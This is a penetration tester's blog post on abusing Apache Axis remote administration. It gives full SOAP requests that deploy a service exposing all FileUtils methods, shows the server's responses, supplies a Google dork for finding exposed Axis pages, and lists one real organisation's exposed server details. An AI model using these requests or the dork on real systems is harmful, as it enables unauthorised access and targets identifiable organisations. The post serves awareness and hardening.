Why you shouldn't use enableRemoteAdmin and lock down your Axis server

Why you shouldn't use enableRemoteAdmin and lock down your Axis server

On a recent pentest I discovered a Apache Axis instance exposed on port 80, I never saw something like this before so I started to play with it and discovered some interesting things.

But first of all let's have a look what Apache Axis is and how it can be used: "Apache Axis is an implementation of the SOAP ("Simple Object Access Protocol") submission to W3C. From the draft W3C specification: SOAP is a lightweight protocol for exchanging structured information in a decentralized, distributed environment. It is an XML based protocol that consists of three parts: an envelope that defines a framework for describing what is in a message and how to process it, a set of encoding rules for expressing instances of application-defined datatypes, and a convention for representing remote procedure calls and responses." - Source: https://axis.apache.org/axis/

We'll focus on the Java version, Apache Axis allows to offer arbitrary Java classes as a webservice that can be executed with a SOAP call.

How do you deploy a webservice without having local access to the server? With a webservice like "AdminService", you can find a list of available services on /servlet/AxisServlet. So you say deploying a new webservice without any authorization can't be possible? Yeah...technically you're right...but:

"I always deploy like this"

The documentation states: "WARNING: enabling remote administration may give unauthorized parties access to your machine. If you do this, please make sure to add security to your configuration!" Source: https://axis.apache.org/axis/java/user-guide.html

Usually access to AdminService is restricted to localhost and can only be exploited using another flaw like a XXE in Oracle PeopleSoft: https://www.ambionics.io/blog/oracle-peoplesoft-xxe-to-rce

Let's try to deploy a webservice remotely which will expose all public methods of the org.apache.commons.io.FileUtils class:

POST /axis/services/AdminService HTTP/1.1
Host: censored
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/xml
SOAPAction: "censored"
Content-Length: 832

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
        xmlns:xsd="http://www.w3.org/2001/XMLSchema"
        xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Body>
        <ns1:deployment
            xmlns="http://xml.apache.org/axis/wsdd/"
            xmlns:java="http://xml.apache.org/axis/wsdd/providers/java"
            xmlns:ns1="http://xml.apache.org/axis/wsdd/">
            <ns1:service name="MaliciousService" provider="java:RPC">
                <ns1:parameter name="className" value="org.apache.commons.io.FileUtils"/>
                <ns1:parameter name="allowedMethods" value="*"/>
            </ns1:service>
        </ns1:deployment>
    </soapenv:Body>
</soapenv:Envelope>

If you get the following response, you were successful and "enableRemoteAdmin" is set to true:

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/xml;charset=utf-8
Date: censored
Connection: close

<?xml version="1.0" encoding="UTF-8"?>

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Body><Admin>Done processing</Admin></soapenv:Body>
</soapenv:Envelope>

You can execute it by calling getTempDirectoryPath() to get the path to the temp folder:

POST /axis/services/MaliciousService HTTP/1.1
Host: censored
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/xml
SOAPAction: "censored"
Content-Length: 381

<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xmlns:api="http://127.0.0.1/Integrics/Enswitch/API"
        xmlns:xsd="http://www.w3.org/2001/XMLSchema"
        xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Body>
        <api:getTempDirectoryPath soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
    </api:getTempDirectoryPath>
    </soapenv:Body>
</soapenv:Envelope>

Voilà, your path (/tmp):

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/xml;charset=utf-8
Date: censored
Connection: close

<?xml version="1.0" encoding="UTF-8"?>

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">

<soapenv:Body><ns1:getTempDirectoryPathResponse soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:ns1="http://127.0.0.1/Integrics/Enswitch/API">
<getTempDirectoryPathReturn xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">/tmp</getTempDirectoryPathReturn></ns1:getTempDirectoryPathResponse></soapenv:Body></soapenv:Envelope>

Depending on the available classes it's possible to execute arbitrary code to compromise the system. Even if you're unlucky you can get a lot of information from /happyaxis.jsp like OS & kernel version, directory structure, Java version, configuration details and even passwords sometimes.

The Central Bank of Brazil reveals that it's using WebSphere on a Linux server (opt/WebSphere/AppServer/profiles/AppSrv) called SERVER4_DINE5 with the kernel 2.6.32-696.13.2.el6.x86_64, their SMTP server is smtp.bcnet.bcb.gov.br and they seem to use java_1.7_64: https://www3.bcb.gov.br/wssgs/happyaxis.jsp According to Red Hat they miss at least one important security fix. :-D

Those pages can be found using the following Google dork:

inurl:"/happyaxis.jsp" intitle:"Axis Happiness Page"

You can find more blog posts about security & Axis here: https://kooksec.blogspot.de/2017/03/manually-exploiting-axis2.html, https://zeroknock.blogspot.de/2012/10/exposed-apache-axis-soap-objects.html

{{ message }}

{{ 'Comments are closed.' | trans }}